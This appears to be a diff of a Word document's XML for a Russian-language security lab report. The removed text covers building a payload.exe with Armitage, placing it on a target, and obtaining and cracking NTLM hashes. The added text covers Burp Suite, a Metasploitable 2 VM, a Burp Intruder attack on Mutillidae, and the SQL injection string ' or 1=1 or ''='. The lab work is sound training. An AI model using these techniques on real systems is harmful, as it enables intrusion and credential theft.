+        <w:t xml:space="preserve">Настроить </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Mutillidae</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для работы с metaspoitable2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и провести атаку типа </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>«</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Sniper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">» в приложении </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Mutillidae</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (входит в состав </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1641,20 +1895,28 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Скопируйте </w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Дождаться окончания атаки средством </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1662,7 +1924,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>хеши</w:t>
+        <w:t>Intruder</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1670,88 +1932,122 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> паролей пользователей ОС Windows. </w:t>
+        <w:t xml:space="preserve"> и проанализировать полученные результаты. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Проверит</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ь</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> результат инъекции ‘</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1=1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=’. Для этого необходимо выбрать вкладку Response, а в ней </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Render</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, чтобы узнать, успешно ли прошла инъекция и какие данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">получены. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Привести скриншот</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> содержащий результат выполнения запроса.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Default"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Отправить полученных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>хеши</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> паролей на расшифровку в ПО </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>JhonTheRipper</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> и получить пароль администратора. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:cs="Times New Roman"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:cs="Times New Roman"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="ru-RU"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1797,19 +2093,13 @@
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Создание полезной нагрузки </w:t>
-      </w:r>
-      <w:r>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>exe</w:t>
+        <w:t>Установ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>ка и настройка</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1817,38 +2107,25 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">в </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Kali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> через </w:t>
-      </w:r>
-      <w:r>
-        <w:t>GUI</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Armitage</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (рисунок 1):</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>Burp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Suite </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>(рисунок 1):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1865,18 +2142,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
           <w:noProof/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11E9B09A" wp14:editId="236223B2">
-            <wp:extent cx="4634396" cy="3971024"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="4" name="Рисунок 4"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D0DFC24" wp14:editId="3C5C26E9">
+            <wp:extent cx="5080000" cy="3713644"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
+            <wp:docPr id="5" name="Рисунок 5"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1896,7 +2168,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4640217" cy="3976012"/>
+                      <a:ext cx="5082837" cy="3715718"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1942,14 +2214,67 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Создание нагрузки через </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Armitage</w:t>
+        <w:t>Настройка</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Burp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Suite</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Kali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Linux</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1972,7 +2297,54 @@
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>Размещение вредоносного файла на целевой ОС (рисунок 2)</w:t>
+        <w:t>Установка</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>и запуск виртуальной машины</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>(рисунок 2)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1989,16 +2361,16 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="654C363A" wp14:editId="7B4261EE">
-            <wp:extent cx="4847566" cy="4069753"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
-            <wp:docPr id="6" name="Рисунок 6"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA145D0" wp14:editId="4CE86290">
+            <wp:extent cx="5137117" cy="3482340"/>
+            <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
+            <wp:docPr id="13" name="Рисунок 13"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2018,7 +2390,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4854288" cy="4075396"/>
+                      <a:ext cx="5138806" cy="3483485"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2049,7 +2421,15 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>Рисунок</w:t>
+        <w:t xml:space="preserve">Рисунок </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>2</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2065,7 +2445,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t>–</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2081,31 +2461,17 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Скачивание </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>payload.exe</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Вход в систему от имени </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msfadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2115,17 +2481,74 @@
           <w:numId w:val="12"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Подключение к целевой ОС (рисунок 3)</w:t>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Привязка </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Kali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(10.0.2.5) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>друг к другу (рисунок 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2134,19 +2557,20 @@
         <w:ind w:left="360"/>
         <w:jc w:val="center"/>
         <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="ru-RU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4877AD14" wp14:editId="7B9029DC">
-            <wp:extent cx="4222542" cy="4305868"/>
-            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
-            <wp:docPr id="2" name="Рисунок 2"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C600B51" wp14:editId="6FD49452">
+            <wp:extent cx="5758180" cy="3526790"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="15" name="Рисунок 15"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2166,7 +2590,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4226241" cy="4309639"/>
+                      <a:ext cx="5758180" cy="3526790"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2181,71 +2605,28 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="aa"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>Рисунок</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>Подключение к целевой ОС</w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рисунок 3 – Результат выполнения команды </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ping</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2255,38 +2636,19 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="12"/>
         </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Получение </w:t>
-      </w:r>
-      <w:r>
-        <w:t>NTLM</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>-хэшей</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (рисунок 4):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>Настройка прокси для выполнения дальнейших заданий:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
@@ -2294,13 +2656,13 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D70A924" wp14:editId="278E4014">
-            <wp:extent cx="4145535" cy="3207223"/>
-            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
-            <wp:docPr id="3" name="Рисунок 3"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E7036D6" wp14:editId="66369CC7">
+            <wp:extent cx="5758180" cy="3743960"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="19" name="Рисунок 19"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2311,27 +2673,20 @@
                     <pic:cNvPr id="1" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
-                  <pic:blipFill rotWithShape="1">
+                  <pic:blipFill>
                     <a:blip r:embed="rId17"/>
-                    <a:srcRect t="1" b="21661"/>
-                    <a:stretch/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4151419" cy="3211775"/>
+                      <a:ext cx="5758180" cy="3743960"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                    <a:extLst>
-                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
-                      </a:ext>
-                    </a:extLst>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -2342,30 +2697,22 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="aa"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
